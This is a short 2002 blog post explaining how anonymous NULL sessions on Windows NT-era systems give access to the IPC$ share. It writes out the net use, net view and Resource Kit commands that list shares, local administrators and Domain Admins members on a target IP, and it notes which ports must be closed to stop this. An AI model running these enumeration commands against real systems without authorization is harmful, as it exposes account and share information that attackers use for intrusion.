Smallvoid.com
  • Home
  • About
  • Articles
  • Links
  • Forum

Using NULL sessions to view shares and user accounts

February 6, 2002 by Snakefoot | 0 Comment

It is possible to access the IPC$ share with a null session, after that one can access information about the machine configuration.

How to create a null session:

net use \\IP_ADDRESS\ipc$ "" /user:""

How to access shares after creation of null session:

net view \\IP_ADDRESS

How to list administrators after creation of null session:

local administrators \\IP_ADDRESS

How to list group members in "domain admins" after creation of null session:

global "domain admins" \\IP_ADDRESS

The utilities local.exe and global.exe. They are part of the Windows NT Resource Kit. WInfo is a 3rd party utility that also can exploit null sessions.

Disabling Netbios or blocking the ports 137-139 doesn't close for Null-Sessions, unless one also closes the SMB on port 445.

Related Restrict access to NULL sessions

More Info MS KB132679
More Info MS KB289655

Credits The Hack FAQ
Tags:
  • anonymous-access, null-session, user-account
Category:
  • User Security,
  • User Security,
  • User Security,
  • User Security

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Related Posts

  • Restrict access for NULL sessions
  • Configure Automatic Logon in Windows NT
  • Restrict guest access to event logs
  • Moving the userprofile to a different location
  • Securing the local Administrator account

Recent Posts

  • Disable IPv6 imaginary tunnel network interfaces
  • Encrypted backup to OneDrive or DropBox
  • Description of soft and hard page faults
  • Windows 10 Upgrade with black screen
  • Wordpress 4.2 Upgrade

Meta

  • Log in
  • Entries feed
  • Comments feed